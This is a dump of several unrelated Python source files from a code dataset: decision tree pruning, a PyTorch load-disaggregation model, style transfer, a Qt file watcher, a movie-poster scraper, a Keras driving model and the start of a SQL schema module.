sub_tree[0]\n printDecisionTreetreeTuple = (bestAttribute, decision)\n if isinstance(sub_tree[0], dict):\n printDecisionTreeTree[printDecisionTreetreeTuple] = sub_tree[1]\n else:\n printDecisionTreeTree[printDecisionTreetreeTuple] = sub_tree[0]\n return root, printDecisionTreeTree\n\n\n\n\n\"\"\"\n\nGet the Non-Leaf Node in a tree\n\n\"\"\"\n\ndef getNonLeafNode(tree, nonLeafList):\n for key, value in tree.items():\n if isinstance(value, dict):\n if type(key) is str:\n nonLeafList.append(key)\n getNonLeafNode(value, nonLeafList)\n return nonLeafList\n\n\"\"\"\n \n Post Prune the decision tree\n \n\"\"\"\n\ndef runPostPruning(L, K, tree, dataset, default):\n treeBest = copy.deepcopy(tree)\n treeBestAccuracy = getAccuracyofTestDataset(dataset, treeBest, default)\n for i in range(L):\n dtree = copy.deepcopy(tree)\n m = random.randint(0, K)\n for j in range(m):\n nonLeafList = list()\n non_leaf = getNonLeafNode(dtree, nonLeafList)\n if len(non_leaf):\n p = random.randint(0, len(non_leaf) - 1)\n targetElement = non_leaf[p]\n dtree = update(dtree, targetElement, dataset)\n if dtree:\n dtreeAccuracy = getAccuracyofTestDataset(dataset, dtree, default)\n if dtreeAccuracy > treeBestAccuracy:\n treeBest = copy.deepcopy(dtree)\n treeBestAccuracy = dtreeAccuracy\n return treeBest\n\n\"\"\"\n \n Print the decision tree\n \n\"\"\"\ndef printDecisionTree(tree, depth=0, accept=\"yes\"):\n if depth == 0:\n print('TREE Visualization \\n')\n \n for index, splitCriterion in enumerate(tree):\n subTrees = tree[splitCriterion]\n print('|\\t' * depth, end='')\n variable = str(splitCriterion[0]).split('.')[0]\n value = str(splitCriterion[1]).split('.')[0]\n if type(subTrees) is dict:\n print('{0} = {1}:'.format(variable, value))\n else:\n subTrees = str(subTrees).split('.')[0]\n print('{0} = {1}:{2}'.format(variable, value, subTrees))\n if type(subTrees) is dict:\n printDecisionTree(subTrees, depth + 1)\n\n\n\"\"\"\n \n Calculate the information Gain of a particular attribute\n \n\"\"\"\ndef calculateInformationGain(dataset, splitAttributeName, targetName=\"Class\",informationGain=0.0):\n datasetEntropy = calculateEntropy(dataset[targetName])\n 
typeOfValues, counts = np.unique(dataset[splitAttributeName], return_counts=True)\n sumOfCounts = np.sum(counts)\n splitEntropy = [\n calculateEntropy(dataset.where(dataset[splitAttributeName] == typeOfValues[i]).dropna()[targetName]) for i in\n range(len(typeOfValues))]\n splitEntropySum = np.sum([(counts[i] / sumOfCounts) * splitEntropy[i] for i in range(len(typeOfValues))])\n informationGain = datasetEntropy - splitEntropySum\n return informationGain\n\n\n\n\n\n\n\"\"\"\n\nTest the accuracyof the test set\n\n\"\"\"\ndef getAccuracyofTestDataset(dataset, tree, default,accuracy=0.0):\n testDict = dataset.iloc[:, :-1].to_dict(orient=\"records\")\n predicted = pd.DataFrame(columns=[\"predict\"])\n for i in range(len(dataset)):\n predicted.loc[i, \"predict\"] = predictClassification(testDict[i], tree, default)\n accuracy = (np.sum(predicted[\"predict\"] == dataset[\"Class\"]) / len(dataset)) * 100\n return accuracy\n\n\n\n\n\"\"\"\n\nLoad all the data into a decision tree\n\n\"\"\"\ndef loadData(file_name,folderName=\"~\"):\n df = pd.read_csv(file_name)\n return df\n\n\nif __name__ == '__main__':\n L = int(int(sys.argv[1]))\n K = int(sys.argv[2])\n train_filename = str(sys.argv[3])\n validation_filename = str(sys.argv[4])\n test_filename = str(sys.argv[5])\n to_print = str(sys.argv[6])\n\n print(\"Information gain without pruning\\n\")\n print(\"Loading the training set for\" + train_filename)\n df = loadData(train_filename)\n print(\"Completed Loading of Training Set\\n\")\n print(\"Creating Decision Tree for Training Set\" + train_filename)\n tree, printDecisionTreeTree = decisionTree(df, df, df.columns[:-1], 1)\n print(\"Decision Tree creation completed \\n\")\n print(\"Loading Validation Set for\" + validation_filename)\n df_validation = loadData(validation_filename)\n print(('Validation Set Loading done'))\n default_index = np.argmax(np.unique(df_validation['Class'], return_counts=True)[1])\n default = np.unique(df_validation['Class'])[default_index]\n accuracy = getAccuracyofTestDataset(df_validation, tree, default)\n print('The predictClassification accuracy on Validation is: ', accuracy, '%')\n print('\\n')\n print(\"Loading Test Set for \" + test_filename)\n dfTest = loadData(test_filename)\n print('Test Set Loading done')\n default_index = np.argmax(np.unique(dfTest['Class'], return_counts=True)[1])\n default = np.unique(dfTest['Class'])[default_index]\n accuracy = getAccuracyofTestDataset(dfTest, tree, default)\n print('The predictClassification accuracy on Test Set is: ', accuracy, '%')\n print(\"\\n\\n\\n\")\n\n if 'yes' in to_print or 'Yes' in to_print or 'YES' in to_print:\n printDecisionTree(printDecisionTreeTree)\n print(\"\\n\\n\\n\\n\\n\\n\")\n\n print(\"Variance Gain Without Pruning\\n\")\n print(\"Loading the Training Set for \" + train_filename)\n df = loadData(train_filename)\n print(\"Training Set loading done\\n\")\n print(\"Creating Decision Tree for Training Set\" + train_filename)\n tree, printDecisionTreeTree = decisionTree(df, df, df.columns[:-1], 2)\n print(\"Decision Tree creation completed\\n\")\n print(\"Loading Validation Set for \" + validation_filename)\n df_validation = loadData(validation_filename)\n print(('Validation Set Loading done'))\n default_index = np.argmax(np.unique(df_validation['Class'], return_counts=True)[1])\n default = np.unique(df_validation['Class'])[default_index]\n accuracy = getAccuracyofTestDataset(df_validation, tree, default)\n print('The predictClassification accuracy on Validation is: ', accuracy, '%')\n print('\\n')\n 
print(\"Loading Test Set for \" + test_filename)\n    dfTest = loadData(test_filename)\n    print('Test Set Loading done')\n    default_index = np.argmax(np.unique(dfTest['Class'], return_counts=True)[1])\n    default = np.unique(dfTest['Class'])[default_index]\n    accuracy = getAccuracyofTestDataset(dfTest, tree, default)\n    print('The predictClassification accuracy on Test Set is: ', accuracy, '%')\n    print(\"\\n\\n\\n\")\n\n    if 'yes' in to_print or 'Yes' in to_print or 'YES' in to_print:\n        printDecisionTree(printDecisionTreeTree)\n        print(\"\\n\\n\\n\\n\\n\\n\")\n\n    print(\"Information Gain with pruning\\n\")\n    print('Using L=' + str(L) + \" K=\" + str(K))\n    print(\"Loading Training Set for \" + train_filename)\n    df = loadData(train_filename)\n    print(\"Training Set loading done\\n\")\n    print(\"Creating Decision Tree for Training Set\" + train_filename)\n    tree, printDecisionTreeTree = decisionTree(df, df, df.columns[:-1], 1)\n    print(\"Decision Tree creation completed \\n\")\n    print(\"Loading Validation Set for \" + validation_filename)\n    df_validation = loadData(validation_filename)\n    print(('Validation Set Loading done'))\n    default_index = np.argmax(np.unique(df_validation['Class'], return_counts=True)[1])\n    default = np.unique(df_validation['Class'])[default_index]\n    print(\"Pruning Begins\")\n    tree = runPostPruning(L, K, tree, df_validation, default)\n    print('Pruning Completed')\n    dfTest = loadData(test_filename)\n    default_index = np.argmax(np.unique(dfTest['Class'], return_counts=True)[1])\n    default = np.unique(dfTest['Class'])[default_index]\n    accuracy = getAccuracyofTestDataset(dfTest, tree, default)\n    print('The predictClassification accuracy is: ', accuracy, '%')\n\n    if 'yes' in to_print or 'Yes' in to_print or 'YES' in to_print:\n        printDecisionTree(printDecisionTreeTree)\n        print(\"\\n\\n\\n\\n\\n\\n\")\n\n    print(\"Variance Gain with pruning\\n\")\n    print('Using L=' + str(L) + \" K=\" + str(K))\n    print(\"Loading Training Set for \" + train_filename)\n    df = loadData(train_filename)\n    print(\"Training Set loading done\\n\")\n    print(\"Creating Decision Tree for Training Set\" + train_filename)\n    tree, printDecisionTreeTree = decisionTree(df, df, df.columns[:-1], 2)\n    print(\"Decision Tree creation completed \\n\")\n    print(\"Loading Validation Set for \" + validation_filename)\n    df_validation = loadData(validation_filename)\n    print(('Validation Set Loading done'))\n    default_index = np.argmax(np.unique(df_validation['Class'], return_counts=True)[1])\n    default = np.unique(df_validation['Class'])[default_index]\n    print(\"Pruning Begins\")\n    tree = runPostPruning(L, K, tree, df_validation, default)\n    print('Pruning Completed')\n    dfTest = loadData(test_filename)\n    default_index = np.argmax(np.unique(dfTest['Class'], return_counts=True)[1])\n    default = np.unique(dfTest['Class'])[default_index]\n    accuracy = getAccuracyofTestDataset(dfTest, tree, default)\n    print('The predictClassification accuracy is: ', accuracy, '%')\n\n    if 'yes' in to_print or 'Yes' in to_print or 'YES' in to_print:\n        printDecisionTree(printDecisionTreeTree)\n        print(\"\\n\\n\\n\\n\\n\\n\")\n","sub_path":"Assignment 1/data_sets1/DecisionTreemod1.py","file_name":"DecisionTreemod1.py","file_ext":"py","file_size_in_byte":13767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"359719081","text":"def sumaDigitos(nro):\r\n    '''Sums the even digits of a number.\r\n    Uses continue when the digit is odd'''\r\n    suma = 0\r\n    while nro > 0:\r\n        digito = nro % 10\r\n        nro = nro // 10\r\n        if 
digito % 2 != 0:\r\n            continue # stop executing the current iteration; move on to the next one.\r\n        suma = suma + digito\r\n    return suma\r\n\r\ndef main():\r\n    n = int(input(\"Enter a number: \"))\r\n    print(f\"The sum of its even digits is: {sumaDigitos(n)}\")\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n    ","sub_path":"Practica 5/Notas/ejemplo_continue1.py","file_name":"ejemplo_continue1.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"186156987","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nfrom better_nilm.model.architecture._base import TorchModel\n\n\"\"\"\nSource: https://github.com/lmssdd/TPNILM\nCheck the paper\nNon-Intrusive Load Disaggregation by Convolutional\nNeural Network and Multilabel Classification\nby Luca Massidda, Marino Marrocu and Simone Manca\n\"\"\"\n\n\nclass _Encoder(nn.Module):\n    def __init__(self, in_features=3, out_features=1, kernel_size=3, padding=1,\n                 stride=1, dropout=0.1):\n        super(_Encoder, self).__init__()\n        self.conv = nn.Conv1d(in_features, out_features,\n                              kernel_size=kernel_size, padding=padding,\n                              stride=stride, bias=False)\n        self.bn = nn.BatchNorm1d(out_features)\n        self.drop = nn.Dropout(dropout)\n\n    def forward(self, x):\n        return self.drop(self.bn(F.relu(self.conv(x))))\n\n\nclass _TemporalPooling(nn.Module):\n    def __init__(self, in_features=3, out_features=1, kernel_size=2,\n                 dropout=0.1):\n        super(_TemporalPooling, self).__init__()\n        self.kernel_size = kernel_size\n        self.pool = nn.AvgPool1d(kernel_size=self.kernel_size,\n                                 stride=self.kernel_size)\n        self.conv = nn.Conv1d(in_features, out_features, kernel_size=1,\n                              padding=0)\n        self.bn = nn.BatchNorm1d(out_features)\n        self.drop = nn.Dropout(dropout)\n\n    def forward(self, x):\n        x = self.pool(x)\n        x = self.conv(x)\n        x = self.bn(F.relu(x))\n        x = self.drop(F.interpolate(x, scale_factor=self.kernel_size,\n                                    mode='linear', align_corners=True))\n        return x\n\n\nclass _Decoder(nn.Module):\n    def __init__(self, in_features=3, out_features=1, kernel_size=2, stride=2):\n        super(_Decoder, self).__init__()\n        self.conv = nn.ConvTranspose1d(in_features, out_features,\n                                       kernel_size=kernel_size, stride=stride,\n                                       bias=False)\n        self.bn = nn.BatchNorm1d(out_features)\n\n    def forward(self, x):\n        return self.conv(x)\n\n\nclass _PTPNet(nn.Module):\n\n    def __init__(self, output_len=480, out_channels=1,\n                 init_features=32, dropout=0.1):\n        super(_PTPNet, self).__init__()\n\n        p = 2\n        k = 1\n        features = init_features\n        self.encoder1 = _Encoder(1, features, kernel_size=3,\n                                 padding=0, dropout=dropout)\n        # (batch, input_len - 2, 32)\n        self.pool1 = nn.MaxPool1d(kernel_size=p, stride=p)\n\n        self.encoder2 = _Encoder(features * 1 ** k, features * 2 ** k,\n                                 kernel_size=3, padding=0, dropout=dropout)\n        # (batch, [input_len - 6] / 2, 64)\n        self.pool2 = nn.MaxPool1d(kernel_size=p, stride=p)\n\n        self.encoder3 = _Encoder(features * 2 ** k, features * 4 ** k,\n                                 kernel_size=3, padding=0, dropout=dropout)\n        # (batch, [input_len - 12] / 4, 128)\n        self.pool3 = nn.MaxPool1d(kernel_size=p, stride=p)\n\n        self.encoder4 = _Encoder(features * 4 ** k, features * 8 ** k,\n                                 kernel_size=3, padding=0, dropout=dropout)\n        # (batch, [input_len - 30] / 8, 256)\n\n        # Compute the output size of the encoder4 layer\n        # (batch, S, 256)\n        s = output_len / 8\n\n        self.tpool1 = _TemporalPooling(features * 8 ** k, features * 2 ** k,\n                                       kernel_size=int(s / 12),\n                                       dropout=dropout)\n        self.tpool2 = 
_TemporalPooling(features * 8 ** k, features * 2 ** k,\n kernel_size=int(s / 6), dropout=dropout)\n self.tpool3 = _TemporalPooling(features * 8 ** k, features * 2 ** k,\n kernel_size=int(s / 3), dropout=dropout)\n self.tpool4 = _TemporalPooling(features * 8 ** k, features * 2 ** k,\n kernel_size=int(s / 2), dropout=dropout)\n\n self.decoder = _Decoder(2 * features * 8 ** k, features * 1 ** k,\n kernel_size=p ** 3, stride=p ** 3)\n\n self.activation = nn.Conv1d(features * 1 ** k, out_channels,\n kernel_size=1, padding=0)\n\n self.power = nn.Conv1d(features * 1 ** k, out_channels,\n kernel_size=1, padding=0)\n\n def forward(self, x):\n enc1 = self.encoder1(x)\n enc2 = self.encoder2(self.pool1(enc1))\n enc3 = self.encoder3(self.pool2(enc2))\n enc4 = self.encoder4(self.pool3(enc3))\n\n tp1 = self.tpool1(enc4)\n tp2 = self.tpool2(enc4)\n tp3 = self.tpool3(enc4)\n tp4 = self.tpool4(enc4)\n\n dec = self.decoder(torch.cat([enc4, tp1, tp2, tp3, tp4], dim=1))\n\n pw = self.power(dec)\n act = self.activation(F.relu(dec))\n\n return pw, act\n\n\nclass ConvModel(TorchModel):\n\n def __init__(self, output_len=480, border=16, out_channels=1,\n init_features=32,\n learning_rate=0.001, dropout=0.1,\n classification_w=1, regression_w=0):\n super(TorchModel, self).__init__()\n\n # The time series will undergo three convolutions + poolings\n # This will give a series of size (batch, S, 256)\n # Where S = output_len / 8\n # That series will them pass by four different filters\n # The output of the four filters must have the same size\n # For this reason, S must be a multiple of 12\n if output_len % 96 != 0:\n s = round(output_len / 96)\n raise ValueError(f\"output_len {output_len} is not valid.\\nClosest\"\n f\" valid value is {96 * s}\")\n\n self.border = border\n\n self.model = _PTPNet(output_len=output_len,\n out_channels=out_channels,\n init_features=init_features,\n dropout=dropout).cuda()\n\n self.optimizer = optim.Adam(self.model.parameters(), lr=learning_rate)\n self.pow_criterion = nn.MSELoss()\n self.act_criterion = nn.BCEWithLogitsLoss()\n self.pow_w = regression_w\n self.act_w = classification_w\n self.pow_loss_avg = 0.0045\n self.act_loss_avg = 0.68\n","sub_path":"better_nilm/model/architecture/conv.py","file_name":"conv.py","file_ext":"py","file_size_in_byte":6398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"519156728","text":"import os\nimport sys\nif '/opt' not in sys.path:\n\tsys.path.append('/opt') # Required for AWS Lambda to find the dependencies layer's psycopg2\n\nAPP_NAME = os.environ.get('app', 'myCookbook')\nSTACK = os.environ.get('stack', 'dev')\nassert STACK\n\n# Pagination\nPER_PAGE = 25\nDEFAULT_PAGE = 1","sub_path":"backend/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"143069322","text":"\"\"\"\nBased on the fact that visual perceptors are more sensitive on changes in luminosity than in colour.\nFrom content and style image we extract luminosity characteristics.\n\nIn most cases, computationally less expensive than color histogram matching.\nIf the process of histogram matching is more complicated it can be less effective than color histogram matching.\n\"\"\"\n\nimport numpy as np\nimport cv2\nfrom utils import mean_std_dev\n\nCONTENT_IMAGE_NAME = \"blagaj.jpg\"\nSTYLE_IMAGE_NAME = \"StarryNightOverTheRoneVanGogh.jpg\"\n\nLOGARITHMIC_COLOR_SPACE = cv2.COLOR_BGR2LAB\nRGB_COLOR_SPACE = 
cv2.COLOR_LAB2BGR\n\n\nclass LuminanceOnlyTransfer(object):\n    def __init__(self):\n        print(\"LuminanceOnlyTransfer initialized.\")\n\n    @staticmethod\n    def open_image_in_log_space(image_path):\n        image = cv2.imread(image_path)\n        image = cv2.cvtColor(image, LOGARITHMIC_COLOR_SPACE)\n        return image\n\n    @staticmethod\n    def match(style_image_path, content_image_path):\n        style_image = LuminanceOnlyTransfer.open_image_in_log_space(style_image_path)\n        s_height, s_width, s_depth = style_image.shape\n        content_image = LuminanceOnlyTransfer.open_image_in_log_space(content_image_path)\n\n        mu_s, sigma_s = mean_std_dev(style_image)\n        mu_c, sigma_c = mean_std_dev(content_image)\n\n        for h in range(0, s_height):\n            for w in range(0, s_width):\n                for d in range(0, s_depth):\n                    \"\"\"\n                    Each luminance pixel is updated with formula:\n                    Ls' = (sigma_c / sigma_s) * (Ls - mu_s) + mu_c\n                    \"\"\"\n                    luminance_pixel = style_image[h, w, d]\n                    luminance_pixel = (sigma_c[d] / sigma_s[d]) * \\\n                                      (luminance_pixel - mu_s[d]) + mu_c[d]\n\n                    if luminance_pixel < 0:\n                        luminance_pixel = 0\n                    if luminance_pixel > 255:\n                        luminance_pixel = 255\n\n                    style_image[h, w, d] = luminance_pixel\n\n        style_image = cv2.cvtColor(style_image, RGB_COLOR_SPACE)\n        cv2.imwrite(\"../images/results/LOT_\" + STYLE_IMAGE_NAME, style_image)\n\n        return style_image\n\n\nLuminanceOnlyTransfer.match(\"../images/style/\" + STYLE_IMAGE_NAME, \"../images/content/\" + CONTENT_IMAGE_NAME)\n","sub_path":"colorPreservationModel/luminance_only_transfer.py","file_name":"luminance_only_transfer.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"427340406","text":"#!/usr/bin/python3\n\n'''\nFilesystem watcher example\n'''\n\nimport sys\nfrom PyQt4 import QtCore, QtGui\nimport signal\n\nimport time\nimport threading\nimport random\n\n\ndef onFileSystemChanged(path):\n    print (\"Changed signal for \" + path)\n    ct = threading.current_thread()\n    print (\"Received in \" + str(ct))\n    print (\"Some action in thread could be started\")\n    t = threading.Thread(target = hello_thread, args = (path,))\n    t.start()\n\ndef hello_thread(in_text):\n    ct = threading.current_thread()\n    st = random.uniform(1.0, 5.0)\n    time.sleep(st)\n    text = \"Hello from \" + str(ct) + \" at time \" + time.ctime() + \" with \" + in_text\n    print(text) \n    \ndef main():\n    app = QtGui.QApplication(sys.argv)\n    \n    qfsw = QtCore.QFileSystemWatcher()\n    qfsw.addPath(\"test.txt\")\n    QtCore.QObject.connect(qfsw,QtCore.SIGNAL(\"directoryChanged(QString)\"),onFileSystemChanged)\n    QtCore.QObject.connect(qfsw,QtCore.SIGNAL(\"fileChanged(QString)\"),onFileSystemChanged)\n    \n    # /\\\n    # ||--- These are different signals!\n    # \\/\n    \n    # Enable Ctrl + C to terminate\n    signal.signal(signal.SIGINT, signal.SIG_DFL)\n\n    # Qt Main loop\n    sys.exit(app.exec())\n    \nif __name__ == \"__main__\":\n    main()","sub_path":"python/nsn-201211/qtfswatch.py","file_name":"qtfswatch.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"428897962","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nt = [-10, -8, 0, 1, 2, 5, -2, -4]\nminimo = t[0]\nmaximo = t[0]\nsoma = 0\n\nfor e in t:\n    if e < minimo:\n        minimo = e\n\n    if e > maximo:\n        maximo = e\n\n    soma += e\n\nprint(\"Minimum %d, Maximum %d, Mean %5.2f\" % (minimo, maximo, (soma / 
len(t))))\n","sub_path":"algorithms/programming_introduction_with_python/chapter6/exercises/6.13/6_13.py","file_name":"6_13.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"562022231","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr  4 20:58:48 2017\n\n@author: Rober\n\"\"\"\n\n\"\"\"\nCreated on Tue Apr  4 11:08:35 2017\n\n@author: goodfellow\n\"\"\"\nimport numpy as np\nimport csv\nimport cv2\nimport sklearn\nfrom sklearn.model_selection import train_test_split\n\nsamples = []\nwith open('./data/driving_log.csv') as csvfile:\n    reader = csv.reader(csvfile)\n    next(reader, None)  # skip the headers\n    for line in reader:\n        samples.append(line)\n\nprint('Read CSV file')\n    \nprint('Splitting DS..')\ntrain_samples, validation_samples = train_test_split(samples, test_size=0.2)\n\ndef test_generator(samples, batch_size=32):\n    num_samples = len(samples)\n    while 1: # Loop forever so the generator never terminates\n        sklearn.utils.shuffle(samples)\n        for offset in range(0, num_samples, batch_size):\n            batch_samples = samples[offset:offset+batch_size]\n\n            images = []\n            angles = []\n            for batch_sample in batch_samples:\n                center_angle = float(batch_sample[3])\n                # Only high steering values\n                if abs(center_angle)>0.85:\n                    source_path = batch_sample[0]\n                    filename = source_path.split('/')[-1]\n                    current_path = './data/IMG/' + filename\n                    center_image = cv2.imread(current_path)\n                    images.append(center_image)\n                    angles.append(center_angle)\n                    # flip the image (not the path string) for augmentation\n                    images.append(cv2.flip(center_image, 1))\n                    angles.append(center_angle * -1.0)\n\n            # trim image to only see section with road\n            X_train = np.array(images)\n            y_train = np.array(angles)\n            print(X_train.shape)\n            print(y_train.shape)\n            return (X_train, y_train)\n\ntest_generator(samples) \n\n    \ndef generator(samples, batch_size=32):\n    num_samples = len(samples)\n    while 1: # Loop forever so the generator never terminates\n        sklearn.utils.shuffle(samples)\n        for offset in range(0, num_samples, batch_size):\n            batch_samples = samples[offset:offset+batch_size]\n\n            images = []\n            angles = []\n            for batch_sample in batch_samples:\n                center_angle = float(batch_sample[3])\n                # Only high steering values\n                if abs(center_angle)>0.85:\n                    source_path = batch_sample[0]\n                    filename = source_path.split('/')[-1]\n                    current_path = './data/IMG/' + filename\n                    center_image = cv2.imread(current_path)\n                    images.append(center_image)\n                    angles.append(center_angle)\n                    # flip the image (not the path string) for augmentation\n                    images.append(cv2.flip(center_image, 1))\n                    angles.append(center_angle * -1.0)\n\n            # trim image to only see section with road\n            X_train = np.array(images)\n            y_train = np.array(angles)\n            #print(X_train.shape)\n            #print(y_train.shape)\n            yield sklearn.utils.shuffle(X_train, y_train)\n\n\n\n#Model\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Flatten, Lambda, Cropping2D\nfrom keras.layers import Conv2D\n#from keras import losses\n\n#Init Variables\nbatch_size = 32\nepochs = 10\n# input image dimensions\nimg_rows, img_cols = 160, 320\ninput_shape = (img_rows, img_cols, 3)\n###############################################\n# compile and train the model using the generator function\nprint('Creating Generators...')\ntrain_generator = generator(train_samples, batch_size=batch_size)\nvalidation_generator = generator(validation_samples, batch_size=batch_size)\n#Check shapes\n\n###############################################\n\nmodel = Sequential()\n# 
Preprocess incoming data, centered around zero with small standard deviation \nmodel.add(Lambda(lambda x: x/127.5 - 1., input_shape=input_shape))\nmodel.add(Cropping2D(cropping=((50,20), (0,0))))\nmodel.add(Conv2D(24, kernel_size=(5, 5),strides=(2, 2), padding='valid', activation='relu'))\nmodel.add(Conv2D(36, kernel_size=(5, 5),strides=(2, 2), padding='valid', activation='relu'))\nmodel.add(Conv2D(48, kernel_size=(5, 5),strides=(2, 2), padding='valid', activation='relu'))\nmodel.add(Conv2D(64, kernel_size=(3, 3), padding='valid', activation='relu'))\nmodel.add(Conv2D(64, kernel_size=(3, 3), padding='valid', activation='relu'))\n#Flatten\nmodel.add(Flatten())\nmodel.add(Dense(100))\nmodel.add(Dense(50))\nmodel.add(Dense(10))\n#Output\nmodel.add(Dense(1))\n\nmodel.summary()\n\n\n#LOAD PRETRAINED MODEL\npretrained_model = False\nif pretrained_model:\n print('Loading Pretrained model')\n model.load_weights('./cp/model-p3-v06.h5')\n\n\n\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\ncheckpointer = ModelCheckpoint(filepath=\"./cp/model-p3-v06.h5\", verbose=1, save_best_only=True,\n monitor='val_loss', save_weights_only=False, mode='auto')\n\nearlystopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=2, verbose=1, mode='auto')\n\n\nmodel.compile(loss='mse', \n optimizer=keras.optimizers.Adam(), \n metrics=None, \n sample_weight_mode=None)\n\nhistory_object = model.fit_generator(\n train_generator,\n samples_per_epoch=len(train_samples),\n nb_epoch=epochs,\n validation_data=validation_generator,\n nb_val_samples=len(validation_samples),\n callbacks=[checkpointer,earlystopping],\n verbose=1)\n\n##############################################################\nimport matplotlib.pyplot as plt\n### print the keys contained in the history object\nprint(history_object.history.keys())\n\n### plot the training and validation loss for each epoch\nplt.plot(history_object.history['loss'])\nplt.plot(history_object.history['val_loss'])\nplt.title('model mean squared error loss')\nplt.ylabel('mean squared error loss')\nplt.xlabel('epoch')\nplt.legend(['training set', 'validation set'], loc='upper right')\nplt.show()\n\n\n\n\n\n\n\n\n","sub_path":"backup/train_Rober_v07.py","file_name":"train_Rober_v07.py","file_ext":"py","file_size_in_byte":6022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"50146294","text":"'''\nYour function should take in a single parameter (a string `word`)\nYour function should return a count of how many occurences of ***\"th\"*** occur within `word`. Case matters.\nYour function must utilize recursion. 
It cannot contain any loops.\n'''\n\n\ndef count_th(word):\n # base case: no letter pairs left to iterate over\n if not word[:2]:\n return 0\n # getting closer to base case: iterate over letter pairs\n else:\n # if 'th' is in first two letters, return 1\n # and recurse on the rest of the word\n if word[:2] == 'th':\n return 1 + count_th(word[1:])\n else:\n return count_th(word[1:])\n","sub_path":"recursive_count_th/count_th.py","file_name":"count_th.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"654346347","text":"from bs4 import BeautifulSoup as bs\nfrom pprint import pprint\nimport requests\nfrom pathlib import Path\n\nurl = \"https://movie.naver.com/movie/running/current.nhn\"\nres = requests.get(url)\nres.raise_for_status()\nsoup = bs(res.text, 'lxml')\n# pprint(soup)\n# hrefL = [div.a[\"href\"] for div in divL]\n# codeL = [href.split(\"=\")[1] for href in hrefL]\n# for href in hrefL:\n# pprint(href.split(\"=\")[1])\ndtL = soup.find_all(\"dt\",attrs={\"class\",\"tit\"})\nurlL = {dt.a[\"href\"].split(\"=\")[1]:dt.a.get_text() for dt in dtL}\nimgsrcL = []\n# pprint(urlL)\nfor url, name in urlL.items():\n res2 = requests.get(\"https://movie.naver.com/movie/bi/mi/photoViewPopup.nhn?movieCode=\"+url)\n pprint(\"https://movie.naver.com/movie/bi/mi/photoViewPopup.nhn?movieCode=\"+url+\" \"+name)\n soup2 = bs(res2.text, \"lxml\")\n imgsrc = soup2.find(\"img\")['src']\n imgsrcL.append(imgsrc+name)\n # res3 = requests.get(imgsrc)\n # Path(\"./img/movie_poster\").mkdir(parents=True,exist_ok=True)\n # with open(\"./img/movie_poster/\"+name+\".jpg\",'wb') as f:\n # f.write(res3.content)\n # idx += 1\n # with open(\"./img/movie_poster/movie{}.jpg\".format(idx),'wb') as f:\n # f.write(res3.content)\npprint(imgsrcL)","sub_path":"W6D4/test7.py","file_name":"test7.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"95249125","text":"from useless.sqlgen.classes import Table, Sequence, ColumnType, Column\nfrom useless.sqlgen.defaults import Pk, Text, DefaultNamed, Bool, PkNum\nfrom useless.sqlgen.defaults import PkBigname, Bigname, Name, Num, PkName\nfrom useless.sqlgen.defaults import DateTime\nfrom useless.sqlgen.statement import Statement\nfrom useless.sqlgen.admin import grant_public, grant_group\n\n\nZipName = ColumnType('varchar', 5)\nStateName = ColumnType('varchar', 2)\nsequences = ['address_ident', 'contact_ident', 'ticket_ident',\n 'location_ident', 'client_ident', 'action_ident', 'task_ident']\n\ndef AutoId(name, seqname, pk=False):\n column = Num(name)\n c = column.constraint\n c.unique = True\n c.null = False\n c.pk = pk\n column.set_auto_increment(seqname)\n return column\n\ndef Now(name):\n column = DateTime(name)\n column.constraint.default_raw = True\n column.constraint.default = 'now()'\n return column\n\nclass ConfigTable(Table):\n def __init__(self):\n uname = PkName('username')\n section = PkName('section')\n option = PkBigname('option')\n value = Text('value')\n cols = [uname, section, option, value]\n Table.__init__(self, 'config', cols)\n \nclass AddressTable(Table):\n def __init__(self):\n idcol = AutoId('addressid', 'address_ident')\n s1 = PkBigname('street1')\n s2 = PkBigname('street2')\n s2.constraint.default = ('')\n city = PkName('city')\n state = Column('state', StateName)\n state.constraint.pk = True\n zip_ = Column('zip', ZipName)\n zip_.constraint.pk = True\n cols = [idcol, 
